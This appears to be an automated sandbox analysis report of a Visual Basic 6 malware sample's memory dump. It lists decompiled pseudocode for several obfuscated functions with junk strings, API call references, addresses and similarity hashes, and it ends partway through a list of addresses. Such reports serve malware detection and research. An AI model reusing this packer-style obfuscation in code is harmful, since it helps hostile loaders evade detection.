Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
String ID: Flimflam$Fribords2$INVALIDNESS
API String ID: 2258197736-3412120936
Opcode ID: 21d9bb6553c249633048b614049a939e30aed6677f22d9a678772abb4c77e030
Instruction ID: 4d82e7fb2c7a36fd85aa9204abf56a3e9fdc8b60545566b143825d0e789d6e9f
Opcode Fuzzy Hash: 21d9bb6553c249633048b614049a939e30aed6677f22d9a678772abb4c77e030
Instruction Fuzzy Hash: 0C71F971D00218ABDB00EBA5D845BDDBBB8BF09704F50853AF105B71E1DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F3D4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041F3D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char* _v92;
				char _v100;
				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				short _t110;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t130;
				char* _t133;
				signed int _t136;
				intOrPtr _t168;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				L00401540();
				_v12 = _t168;
				_v8 = 0x401368;
				L004017B6();
				L004017B6();
				L004017B6();
				_v92 =  &_v44;
				_v100 = 0x4008;
				_push( &_v100);
				_push( &_v68);
				L0040181C();
				_v108 = L"ICHTHYOPOLISM";
				_v116 = 0x8008;
				_push( &_v68);
				_t110 =  &_v116;
				_push(_t110);
				L00401660();
				_v120 = _t110;
				L00401828();
				if(_v120 != 0) {
					if( *0x4233c0 != 0) {
						_v144 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v144 = 0x4233c0;
					}
					_v120 =  *_v144;
					_t118 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t118;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v148 = _t118;
					}
					_v128 = _v52;
					_t123 =  *((intOrPtr*)( *_v128 + 0xd8))(_v128,  &_v48);
					asm("fclex");
					_v132 = _t123;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xd8);
						_push(0x40258c);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v152 = _t123;
					}
					_v140 = _v48;
					_v48 = _v48 & 0x00000000;
					L0040183A();
					L004017C2();
					if( *0x4233c0 != 0) {
						_v156 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v156 = 0x4233c0;
					}
					_v120 =  *_v156;
					_t130 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t130;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v160 = _t130;
					}
					_v128 = _v52;
					_v108 = 0x80020004;
					_v116 = 0xa;
					_v60 = 0x92ac1b00;
					_v56 = 0x5af5;
					_v68 = 6;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 =  &_v68;
					L0040165A();
					L0040183A();
					_t136 =  *((intOrPtr*)( *_v128 + 0x13c))(_v128, _t133, _t133, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe, 0x10);
					asm("fclex");
					_v132 = _t136;
					if(_v132 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x40258c);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v164 = _t136;
					}
					L00401846();
					L004017C2();
					L00401828();
				}
				_v60 = 0x607e9f;
				_v68 = 3;
				_t112 =  &_v68;
				_push(_t112);
				L0040166C();
				L0040183A();
				L00401828();
				_v24 = 0x5b2ec5;
				_push(0x41f6f3);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t112;
			}

0x0041f3d9
0x0041f3e4
0x0041f3e5
0x0041f3f1
0x0041f3f9
0x0041f3fc
0x0041f409
0x0041f414
0x0041f421
0x0041f429
0x0041f42c
0x0041f436
0x0041f43a
0x0041f43b
0x0041f440
0x0041f447
0x0041f451
0x0041f452
0x0041f455
0x0041f456
0x0041f45b
0x0041f462
0x0041f46d
0x0041f47a
0x0041f497
0x0041f47c
0x0041f47c
0x0041f481
0x0041f486
0x0041f48b
0x0041f48b
0x0041f4a9
0x0041f4b8
0x0041f4bb
0x0041f4bd
0x0041f4c4
0x0041f4e0
0x0041f4c6
0x0041f4c6
0x0041f4c8
0x0041f4cd
0x0041f4d0
0x0041f4d3
0x0041f4d8
0x0041f4d8
0x0041f4ea
0x0041f4f9
0x0041f4ff
0x0041f501
0x0041f508
0x0041f527
0x0041f50a
0x0041f50a
0x0041f50f
0x0041f514
0x0041f517
0x0041f51a
0x0041f51f
0x0041f51f
0x0041f531
0x0041f537
0x0041f544
0x0041f54c
0x0041f558
0x0041f575
0x0041f55a
0x0041f55a
0x0041f55f
0x0041f564
0x0041f569
0x0041f569
0x0041f587
0x0041f596
0x0041f599
0x0041f59b
0x0041f5a2
0x0041f5be
0x0041f5a4
0x0041f5a4
0x0041f5a6
0x0041f5ab
0x0041f5ae
0x0041f5b1
0x0041f5b6
0x0041f5b6
0x0041f5c8
0x0041f5cb
0x0041f5d2
0x0041f5d9
0x0041f5e0
0x0041f5e7
0x0041f5f1
0x0041f5fb
0x0041f5fc
0x0041f5fd
0x0041f5fe
0x0041f607
0x0041f60b
0x0041f615
0x0041f623
0x0041f629
0x0041f62b
0x0041f632
0x0041f651
0x0041f634
0x0041f634
0x0041f639
0x0041f63e
0x0041f641
0x0041f644
0x0041f649
0x0041f649
0x0041f65b
0x0041f663
0x0041f66b
0x0041f66b
0x0041f670
0x0041f677
0x0041f67e
0x0041f681
0x0041f682
0x0041f68c
0x0041f694
0x0041f699
0x0041f6a0
0x0041f6cd
0x0041f6d5
0x0041f6dd
0x0041f6e5
0x0041f6ed
0x0041f6f2

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F3F1
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F409
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F414
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F421
#524.MSVBVM60(?,00004008), ref: 0041F43B
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F456
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F462
__vbaNew2.MSVBVM60(0040257C,004233C0,00008008,?,?,?,?,00004008), ref: 0041F486
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F4D3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F51A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F544
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F54C
__vbaNew2.MSVBVM60(0040257C,004233C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F564
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041F5B1
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F5F1
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F60B
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F615
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F644
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F65B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F663
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F66B
#536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F682
__vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F68C
__vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F694
__vbaFreeStr.MSVBVM60(0041F6F3,00000003,00008008,?,?,?,?,00004008), ref: 0041F6CD
__vbaFreeStr.MSVBVM60(0041F6F3,00000003,00008008,?,?,?,?,00004008), ref: 0041F6D5
__vbaFreeStr.MSVBVM60(0041F6F3,00000003,00008008,?,?,?,?,00004008), ref: 0041F6DD
__vbaFreeStr.MSVBVM60(0041F6F3,00000003,00008008,?,?,?,?,00004008), ref: 0041F6E5
__vbaFreeStr.MSVBVM60(0041F6F3,00000003,00008008,?,?,?,?,00004008), ref: 0041F6ED

Strings

Gurgledes, xrefs: 0041F419
ICHTHYOPOLISM, xrefs: 0041F440

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
String ID: Gurgledes$ICHTHYOPOLISM
API String ID: 2536202667-1995639141
Opcode ID: 163e651ee97182b202a98270d12cf7b3a58e495d4e2a1bc663e6cba906cb5700
Instruction ID: 186eaf9088a23cc06d36d0d6f2fdaec652530da2d7ec8f78cafe16e42c51ae8f
Opcode Fuzzy Hash: 163e651ee97182b202a98270d12cf7b3a58e495d4e2a1bc663e6cba906cb5700
Instruction Fuzzy Hash: CF91F871D00218EFDB10EFA5C885BDDBBB5BF09708F20466AE005B71A2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F70E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041F70E(void* __ebx, void* __edi, void* __esi, void* _a16, void* _a20, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v48;
				void* _v52;
				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v120;
				intOrPtr _v128;
				signed int* _v136;
				char _v144;
				signed int _v148;
				short _v152;
				signed int _v164;
				signed int* _t54;
				signed int _t56;
				short _t58;
				char* _t61;
				char* _t67;
				void* _t95;
				intOrPtr _t96;

				_t96 = _t95 - 0xc;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				L00401540();
				_v16 = _t96;
				_v12 = 0x401380;
				L004017B6();
				L004017B6();
				_t54 = _a24;
				 *_t54 =  *_t54 & 0x00000000;
				_push(L"Dukkestuer");
				L00401762();
				_v136 = _t54;
				_v144 = 0x8003;
				_v72 =  *0x401378;
				_v80 = 4;
				_push( &_v96);
				_t56 =  &_v80;
				_push(_t56);
				L004017A4();
				_v148 = _t56;
				if(_v148 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(_v148);
					L0040179E();
					_v164 = _t56;
				}
				_push( &_v144);
				_t58 =  &_v96;
				_push(_t58);
				L004016AE();
				_v152 = _t58;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t61 = _v152;
				if(_t61 != 0) {
					_push( &_v80);
					L00401654();
					L0040174A();
					_v88 = 5;
					_v96 = 2;
					_v120 = L"LAAGETS";
					_v128 = 8;
					L0040184C();
					_push( &_v96);
					_push(5);
					_push( &_v80);
					_push( &_v112);
					L0040168A();
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push( &_v112);
					_t67 =  &_v60;
					_push(_t67);
					L00401858();
					_push(_t67);
					_push(L"SNVRET");
					_push(L"OVERBEBYRDES");
					L004016D8();
					L0040183A();
					_push(_t67);
					L004017B0();
					L0040183A();
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L004017D4();
					_push( &_v112);
					_push( &_v96);
					_t61 =  &_v80;
					_push(_t61);
					_push(3);
					L00401840();
				}
				L004017B6();
				asm("wait");
				_push(0x41f916);
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t61;
			}

0x0041f711
0x0041f714
0x0041f71f
0x0041f720
0x0041f72c
0x0041f734
0x0041f737
0x0041f744
0x0041f74f
0x0041f754
0x0041f757
0x0041f75a
0x0041f75f
0x0041f764
0x0041f76a
0x0041f77a
0x0041f77d
0x0041f787
0x0041f788
0x0041f78b
0x0041f78c
0x0041f791
0x0041f79e
0x0041f7b3
0x0041f7a0
0x0041f7a0
0x0041f7a6
0x0041f7ab
0x0041f7ab
0x0041f7c0
0x0041f7c1
0x0041f7c4
0x0041f7c5
0x0041f7ca
0x0041f7d4
0x0041f7d8
0x0041f7d9
0x0041f7db
0x0041f7e3
0x0041f7ec
0x0041f7f5
0x0041f7f6
0x0041f801
0x0041f806
0x0041f80d
0x0041f814
0x0041f81b
0x0041f828
0x0041f830
0x0041f831
0x0041f836
0x0041f83a
0x0041f83b
0x0041f840
0x0041f842
0x0041f844
0x0041f849
0x0041f84a
0x0041f84d
0x0041f84e
0x0041f853
0x0041f854
0x0041f859
0x0041f85e
0x0041f868
0x0041f86d
0x0041f86e
0x0041f878
0x0041f880
0x0041f884
0x0041f885
0x0041f887
0x0041f892
0x0041f896
0x0041f897
0x0041f89a
0x0041f89b
0x0041f89d
0x0041f8a2
0x0041f8ad
0x0041f8b2
0x0041f8b3
0x0041f8f8
0x0041f900
0x0041f908
0x0041f910
0x0041f915

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F72C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F744
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F74F
__vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F75F
#564.MSVBVM60(00000004,?), ref: 0041F78C
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F7A6
__vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F7C5
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F7DB
#546.MSVBVM60(?,?,?,00401546), ref: 0041F7F6
__vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F801
__vbaVarDup.MSVBVM60 ref: 0041F828
#629.MSVBVM60(?,?,00000005,00000002), ref: 0041F83B
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F84E
#712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F85E
__vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F868
#527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F86E
__vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F878
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F887
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F89D
__vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F8AD
__vbaFreeStr.MSVBVM60(0041F916,?,?,00401546), ref: 0041F8F8
__vbaFreeStr.MSVBVM60(0041F916,?,?,00401546), ref: 0041F900
__vbaFreeVar.MSVBVM60(0041F916,?,?,00401546), ref: 0041F908
__vbaFreeStr.MSVBVM60(0041F916,?,?,00401546), ref: 0041F910

Strings

SNVRET, xrefs: 0041F854
Dukkestuer, xrefs: 0041F75A
LAAGETS, xrefs: 0041F814
OVERBEBYRDES, xrefs: 0041F859
Antievangelical9, xrefs: 0041F8A5

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
API String ID: 3927249403-1920341584
Opcode ID: 49cbca9fff099b46a770dc6d15c1766e07b0c8b29cbb9fe0958ee466a5e06b95
Instruction ID: dd9ebbf1295adc12ccb3d122a3540716221e599613198e9ae1e533a76fa612b3
Opcode Fuzzy Hash: 49cbca9fff099b46a770dc6d15c1766e07b0c8b29cbb9fe0958ee466a5e06b95
Instruction Fuzzy Hash: BE51EC72D00209ABDB10EBE1DC46FDEB778AF04704F10817AB515B71E1EB785A49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED99, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041ED99(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v92;
				intOrPtr _v100;
				signed int* _t37;
				char* _t40;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L00401540();
				_v16 = _t67;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401546, _t64);
				_t37 = _a16;
				 *_t37 =  *_t37 & 0x00000000;
				_push(0xb5);
				_push(L"SKADESLSHOLDELSERNE");
				_push(L"Fritgaaende");
				_push(0);
				L00401690();
				if(_t37 == 0xa2) {
					_v60 = 0xfe;
					_v68 = 2;
					_v92 = L"Flskekdet";
					_v100 = 8;
					L0040184C();
					_push( &_v68);
					_push(0x48);
					_push( &_v52);
					_push( &_v84);
					L0040168A();
					_push( &_v84);
					L00401834();
					L0040183A();
					_push( &_v84);
					_push( &_v68);
					_push( &_v52);
					_push(3);
					L00401840();
					_push(0x4f);
					_push(0x9e);
					_push(0x14);
					_push( &_v52);
					L00401684();
					_t37 =  &_v52;
					_push(_t37);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"GILENO");
				L004017EC();
				_push(_t37);
				_push( &_v52);
				L0040167E();
				_t40 =  &_v52;
				_push(_t40);
				L00401834();
				L0040183A();
				L00401828();
				_push(0x41ef03);
				L00401846();
				L00401846();
				return _t40;
			}

0x0041ed9c
0x0041edab
0x0041edb5
0x0041edbd
0x0041edc0
0x0041edc7
0x0041edd6
0x0041edd9
0x0041eddc
0x0041eddf
0x0041ede4
0x0041ede9
0x0041edee
0x0041edf0
0x0041edfa
0x0041ee00
0x0041ee07
0x0041ee0e
0x0041ee15
0x0041ee22
0x0041ee2a
0x0041ee2b
0x0041ee30
0x0041ee34
0x0041ee35
0x0041ee3d
0x0041ee3e
0x0041ee48
0x0041ee50
0x0041ee54
0x0041ee58
0x0041ee59
0x0041ee5b
0x0041ee63
0x0041ee65
0x0041ee6a
0x0041ee6f
0x0041ee70
0x0041ee75
0x0041ee78
0x0041ee79
0x0041ee83
0x0041ee8b
0x0041ee8b
0x0041ee90
0x0041ee95
0x0041ee9d
0x0041eea1
0x0041eea2
0x0041eea7
0x0041eeaa
0x0041eeab
0x0041eeb5
0x0041eebd
0x0041eec2
0x0041eef5
0x0041eefd
0x0041ef02

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EDB5
__vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDF0
__vbaVarDup.MSVBVM60 ref: 0041EE22
#629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041EE35
__vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041EE3E
__vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041EE48
__vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041EE5B
#539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EE70
__vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EE79
__vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EE83
__vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EE8B
#696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EE95
#698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EEA2
__vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EEAB
__vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EEB5
__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EEBD
__vbaFreeStr.MSVBVM60(0041EF03,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EEF5
__vbaFreeStr.MSVBVM60(0041EF03,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EEFD

Strings

SKADESLSHOLDELSERNE, xrefs: 0041EDE4
Fritgaaende, xrefs: 0041EDE9
Flskekdet, xrefs: 0041EE0E
GILENO, xrefs: 0041EE90

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#539#629#696#698ChkstkList
String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
API String ID: 1195518721-3815085929
Opcode ID: 2de87991babe3064bf4dfa18b9fe0e7cb604155d080b56e902b8da5a8c074ea6
Instruction ID: 7cacce7f9ea1f443c7d79411a906ee4a8c5c867cdc773c1e5b5b9fdbbeb07709
Opcode Fuzzy Hash: 2de87991babe3064bf4dfa18b9fe0e7cb604155d080b56e902b8da5a8c074ea6
Instruction Fuzzy Hash: 4931DA72940258ABDB00FBD1DD86FEEB7B8BF04704F54443AB501BB1E1DB789A098B58

Uniqueness

Uniqueness Score: -1.00%

Function 00420D57, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00420D57(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				short _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				intOrPtr* _v256;
				signed int _v260;
				signed int _v264;
				char* _t91;
				short _t93;
				short _t100;
				signed int _t106;
				signed int _t110;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t125 = _t124 - 0x18;
				 *[fs:0x0] = _t125;
				L00401540();
				_v28 = _t125;
				_v24 = 0x401470;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t122);
				_v8 = 1;
				_v8 = 2;
				if(0 != 0) {
					_v8 = 3;
					L004017AA();
					_v52 = __fp0;
					_v8 = 4;
					if( *0x4233c0 != 0) {
						_v256 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v256 = 0x4233c0;
					}
					_v220 =  *_v256;
					_t106 =  *((intOrPtr*)( *_v220 + 0x4c))(_v220,  &_v56);
					asm("fclex");
					_v224 = _t106;
					if(_v224 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40256c);
						_push(_v220);
						_push(_v224);
						L004017C8();
						_v260 = _t106;
					}
					_v228 = _v56;
					_t110 =  *((intOrPtr*)( *_v228 + 0x28))(_v228);
					asm("fclex");
					_v232 = _t110;
					if(_v232 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x402ec8);
						_push(_v228);
						_push(_v232);
						L004017C8();
						_v264 = _t110;
					}
					L004017C2();
				}
				_v8 = 6;
				_v64 = 0x637f55;
				_v72 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v72);
				L0040161E();
				L0040183A();
				L00401828();
				_v8 = 7;
				_v64 = 0x1f1c50;
				_v72 = 3;
				_push( &_v72);
				_push( &_v88);
				L00401678();
				_v96 = 0xc1;
				_v104 = 2;
				_push( &_v104);
				_push(0xe7);
				_push( &_v88);
				_push( &_v120);
				L004015F4();
				_v128 = 0x1a6490;
				_v136 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t91 =  &_v136;
				_push(_t91);
				L004015EE();
				_v144 = _t91;
				_v152 = 0x8008;
				_push( &_v120);
				_t93 =  &_v152;
				_push(_t93);
				L00401660();
				_v220 = _t93;
				_push( &_v152);
				_push( &_v120);
				_push( &_v136);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(6);
				L00401840();
				_t100 = _v220;
				if(_t100 != 0) {
					_v8 = 8;
					_push(0xffffffff);
					L004016E4();
					_v8 = 9;
					_push(L"Cryptodeist");
					L004017B0();
					L0040183A();
				}
				_v8 = 0xb;
				_v40 = 0x85ca67;
				asm("wait");
				_push(0x421036);
				L00401846();
				L00401846();
				return _t100;
			}

0x00420d5a
0x00420d69
0x00420d75
0x00420d7d
0x00420d80
0x00420d87
0x00420d8e
0x00420d9d
0x00420da0
0x00420da7
0x00420db2
0x00420db8
0x00420dbf
0x00420dc4
0x00420dc7
0x00420dd5
0x00420df2
0x00420dd7
0x00420dd7
0x00420ddc
0x00420de1
0x00420de6
0x00420de6
0x00420e04
0x00420e1c
0x00420e1f
0x00420e21
0x00420e2e
0x00420e50
0x00420e30
0x00420e30
0x00420e32
0x00420e37
0x00420e3d
0x00420e43
0x00420e48
0x00420e48
0x00420e5a
0x00420e6e
0x00420e71
0x00420e73
0x00420e80
0x00420ea2
0x00420e82
0x00420e82
0x00420e84
0x00420e89
0x00420e8f
0x00420e95
0x00420e9a
0x00420e9a
0x00420eac
0x00420eac
0x00420eb1
0x00420eb8
0x00420ebf
0x00420ec6
0x00420ec8
0x00420eca
0x00420ecc
0x00420ed1
0x00420ed2
0x00420edc
0x00420ee4
0x00420ee9
0x00420ef0
0x00420ef7
0x00420f01
0x00420f05
0x00420f06
0x00420f0b
0x00420f12
0x00420f1c
0x00420f1d
0x00420f25
0x00420f29
0x00420f2a
0x00420f2f
0x00420f36
0x00420f40
0x00420f42
0x00420f44
0x00420f46
0x00420f48
0x00420f4e
0x00420f4f
0x00420f54
0x00420f5a
0x00420f67
0x00420f68
